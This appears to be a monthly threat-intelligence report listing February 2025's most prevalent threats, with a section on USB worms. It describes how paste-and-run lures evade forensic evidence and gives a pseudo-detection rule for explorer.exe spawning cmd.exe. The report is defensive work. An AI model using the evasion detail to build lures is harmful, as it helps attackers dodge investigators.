Highlights from February
SocGholish came in number 1 on our top 10 most prevalent threat list for the first time since April 2024. It’s been on the list for over a year now, placing somewhere in the top 10 every month since December 2023—frequently enough to rank first in the newly released 2025 Threat Detection Report, which lists the top 10 threats for all of 2024. Its fake update brethren, Scarlet Goldfinch, returned to the list this month in 4th and delivered enough NetSupport Manager for that threat to be one of our 9th place ties.
Paste and run, the initial access technique that tricks users into executing PowerShell code, shows no sign of slowing down. Last month we saw paste and run (aka ClickFix) as precursor activity for several payloads including LummaC2, Vidar, and XMRig. While the fake CAPTCHA-style lure remains popular, other types of lures are still used. For example, a recent report shared details of paste and run activity that spawns as a fake error message from a malicious phishing attachment. This report also shows the lure coaching the user to use WIN+X, instead of the previously-seen WIN+R. This is notable because WIN+X opens the same menu as WIN+R without generating a RunMRU key as evidence of execution.
Four threats on our top 10 list this month—Phorpiex, Tangerine Turkey, Gamarue, and PyFileDel—are worms, with Phorpiex and PyFileDel making their debut on the list tied for 4th and 9th places respectively. Read more about worm threats below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for February 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⬆ 1 | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| Month's rank: ⬆ 2 | Threat name: | Threat description : Red Canary's name for a cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| Month's rank: ⬆ 3 | Threat name: | Threat description : Red Canary's name for a suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper |
| Month's rank: ⬆ 4* | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
| Month's rank: ⬆ 4* | Threat name: Phorpiex | Threat description : IRC-based botnet that spreads via USB worm functionality and also sends spam emails to phish additional users, and has reportedly delivered ransomware and cryptocurrency miners |
| Month's rank: ⬆ 4* | Threat name: | Threat description : Red Canary's name for a VBS worm that is delivered via an infected USB and uses a printui DLL hijack to deliver a cryptomining payload |
| Month's rank: ⬆ 9* | Threat name: Adload | Threat description : macOS malware that attempts to hijack and redirect user web browsing traffic |
| Month's rank: ⬇ 9* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Month's rank: ⬇ 9* | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Month's rank: ⬇ 9* | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 9* | Threat name: PyFileDel | Threat description : Python worm that propagates by copying itself to physical and removable drives |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Digging up worms
Four worms made this month’s top 10 list—Phorpiex, Tangerine Turkey, Gamarue, and PyFileDel—which provides a good opportunity to dig into them a little bit. We track over 30 worms at Red Canary, from traditional worms like Conficker—which has been in our top 10 before, most recently in August 2023—to newer USB worms like Tangerine Turkey and Raspberry Robin. Two additional worms, Ippedo and Bondat, have also previously made our top 10 list.
At Red Canary, when we use the term “worm,” we are almost always referring to a USB worm that propagates by itself via removable drives onto victim systems. The traditional definition of a worm—a threat that self-replicates or propagates across an environment from one system to another without additional user interaction—is not something that we see as frequently.
So when we refer to a worm, we mean:
- Distribution is not actively controlled by adversaries; it is passive, opportunistic, and appears to self-propagate from infected systems onto removable media.
- We can observe a worm’s installation and execution behaviors, as well as persistence mechanisms it creates.
- We typically don’t have insight into replication onto USB drives plugged into the victim endpoint, or initial infection vectors for the USB prior to being plugged into the endpoint, although sometimes we are able to learn more using OSINT or shared intelligence.
It’s worth taking a look at the context of this past month’s activity, lest we give the impression we are seeing an unusual wave of worms:
- The presence of worms varies from environment-to-environment, depending largely on USB use cases and policies. Once worms are in an environment they can be challenging to remove entirely, meaning some of our customers may have frequent worm threats while others may see few to none. One of the top MITRE ATT&CK® techniques we saw in manufacturing environments last year was T1091, Replication Through Removable Media. Since manufacturers likely have use cases for USB devices in their workflows, they may have more permissive USB and device policies, which in turn makes them more vulnerable to USB worms.
- Worm use over many years combined with their persistent nature means we regularly detect worms, regardless of whether they manifest in large enough numbers to make it into the top 10. For example, we’ve observed Phorpiex consistently since 2021 even though this is its first time in the top 10. The same is true for many of the other worms we track.
- As an initial access vector still in use by adversaries, worms are subject to waxing and waning popularity. This includes observed fluctuations in previously existing worms, the appearance of new USB worms, and new campaigns leveraging USBs to distribute existing malware families.
One solid mitigation strategy for USB worms is to implement a restrictive USB and removable media policy, giving these threats no opportunity to infect endpoints in your environment. In situations where USB drives are allow-listed, there are detection opportunities for worms. They can vary, depending on the worm and its behaviors. We frequently see worms leverage Windows Command Shell as part of the execution process, which gives us a detection opportunity.
Detection opportunity: Windows Explorer spawning Command Shell with start and exit commands
The following pseudo-detection analytic looks for instances of explorer.exe spawning cmd.exe along with corresponding start and exit commands that we commonly observe in conjunction with a wide variety of malicious activity, including worms like Phorpiex and Ippedo.
parent_process == (explorer.exe)
&&
process == (cmd.exe)
&&
command_includes (“start” && “exit”)
Related Articles
Tangerine Turkey mines cryptocurrency in global campaign